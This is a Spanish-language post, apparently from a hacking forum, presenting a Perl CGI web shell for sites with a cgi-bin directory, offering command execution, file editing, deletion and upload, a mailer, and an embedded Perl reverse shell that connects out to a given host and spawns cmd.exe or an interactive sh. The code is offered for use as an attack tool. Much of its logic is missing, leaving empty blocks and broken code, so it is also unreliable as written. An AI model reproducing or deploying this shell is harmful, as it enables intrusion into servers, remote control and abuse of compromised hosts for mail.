Hoy eh terminado de hacer un shell en cgi , estas shells se usan en las paginas que pemiten ejecutar archivos cgi y tienen el directorio cgi-bin
Esta shell tiene las sig opciones
* Listar directorios
* Ver y editar archivos
* Eliminar archivos y directorios
* ReverseShell
* Subir archivos a un directorio especificado
* Ejecutar comandos
* Enviar mails
Código
#!"\xampp\perl\bin\perl.exe" # #CGI Shell 0.1 # #(C) Doddy Hackman 2011 # # use CGI; use Cwd; use HTML::Entities; use Net::SMTP; my %rta; my $que = new CGI; my @ques = $que->param; for(@ques) { $rta{$_} = $que->param($_); } print " <style type=text/css> .main { margin : -287px 0px 0px -490px; border : White solid 1px; BORDER-COLOR: #00FF00; } #pie { position: absolute; bottom: 0; } body,a:link { background-color: #000000; color:#00FF00; Courier New; cursor:crosshair; font-size: small; } input,table.outset,table.bord,table,textarea,select { font: normal 10px Verdana, Arial, Helvetica, sans-serif; background-color:black;color:#00FF00; border: solid 1px #00FF00; border-color:#00FF00 } a:link,a:visited,a:active { color: #00FF00; font: normal 10px Verdana, Arial, Helvetica, sans-serif; text-decoration: none; } </style> <title>CGI Shell (C) Doddy Hackman 2011</title> <h2><center>CGI Shell</center></h2> "; if ($rta{'filex'}) { } close FILE; } if ($rta{'codefile'}) { close FILE; } if ($rta{'loadfile'}) { if (-f $rta{'loadfile'}) { @words = <FILE>; close FILE; for (@words) { } print " </textarea></center> <input type=hidden name=filecode value=".$rta{'loadfile'}."> <br><br><center><input type=submit value=Save></center><br><br> </form> "; } } print " <br><br> <b>Console</b> <br><br> <fieldset>"; if ($rta{'cmd'}) { } elsif ($rta{'mail'}) { $send->mail($rta{'mail'}); $send->to($rta{'to'}); $send->data(); $send->datasend("To:".$rta{'to'}."\n"."From:".$rta{'mail'}."\n"."Subject:".$rta{'subject'}."\n".$rta{'body'}."\n\n"); $send->dataend(); $send->quit(); } elsif ($rta{'loadir'}) { if (-d $rta{'loadir'}) { close DIR; for(@archivos) { if (-d $_) { } else { }}}} elsif (-f $rta{'delfile'}) { } else { } } elsif (-d $rta{'deldir'}) { } else { } } elsif ($rta{'ipconnect'}) { $code = ' #!usr/bin/perl #Reverse Shell 0.1 #By Doddy H use IO::Socket; print "\n== -- Reverse Shell 0.1 - Doddy H 2010 -- ==\n\n"; unless (@ARGV == 2) { print "[Sintax] : $0 <host> <port>\n\n"; exit(1); } else { print "[+] Starting the connection\n"; print "[+] Enter in the system\n"; print "[+] Enjoy !!!\n\n"; conectar($ARGV[0],$ARGV[1]); tipo(); } sub conectar { socket(REVERSE, PF_INET, SOCK_STREAM, getprotobyname("tcp")); connect(REVERSE, sockaddr_in($_[1],inet_aton($_[0]))); open (STDIN,">&REVERSE"); open (STDOUT,">&REVERSE"); open (STDERR,">&REVERSE"); } sub tipo { print "\n[*] Reverse Shell Starting...\n\n"; if ($^O =~/Win32/ig) { infowin(); system("cmd.exe"); } else { infolinux(); #root(); system("export TERM=xterm;exec sh -i"); } } sub infowin { print "[+] Domain Name : ".Win32::DomainName()."\n"; print "[+] OS Version : ".Win32::GetOSName()."\n"; print "[+] Username : ".Win32::LoginName()."\n\n\n"; } sub infolinux { print "[+] System information\n\n"; system("uname -a"); print "\n\n"; } #The End '; if ($^O =~/Win32/ig) { } else { } close FILE; if ($^O == "MSWin32") { } else { } } else { close DIR; for(@archivos) { if (-d $_) { } else { }} } print "</fieldset> <br><br> <form action='' method=GET> <b>Command</b> : <input type=text name=cmd size=100 value=ver><input type=submit value=Send><br> </form> <form action='' method=GET> <B>Load directory</B> : <input type=text size=100 name=loadir value=".getcwd()."><input type=submit value=Load> </form> <form action='' method=GET> <b>Load File</b> : <input type=text size=100 name=loadfile value=".getcwd()."><input type=submit value=Load> </form> <form action='' method=GET> <b>Delete File</b> : <input type=text size=100 name=delfile value=".getcwd()."><input type=submit value=Del> </form> <form action='' method=GET> <b>Delete Directory</b> : <input type=text size=100 name=deldir><input type=submit value=Del> </form> <form enctype='multipart/form-data' method=POST> <br><b>Upload File</b> : <input type=file name=filex><br><br> <b>To dir</b> : <input type=text name=todir value=".getcwd()."><br><br> <input type=submit value=Upload> </form> <br><B>Mailer</b><br><br> <form action='' method=GET> <b>Mail</b> : <input type=text name=mail><br> <b>To</b> : <input type=text name=to><br> <b>Subject</B> : <input type=text name=subject><br> <B>Body</B> : <input type=text name=body><br><br> <input type=submit value=Send> </form> <br><br><b>ReverseShell</b><br><br> <form action='' method=GET> <b>IP</B> : <input type=text name=ipconnect><br> <b>Port</B> : <input type=text name=port><br> <br><input type=submit value=Connect></form><br><br> "; # ¿ The End ?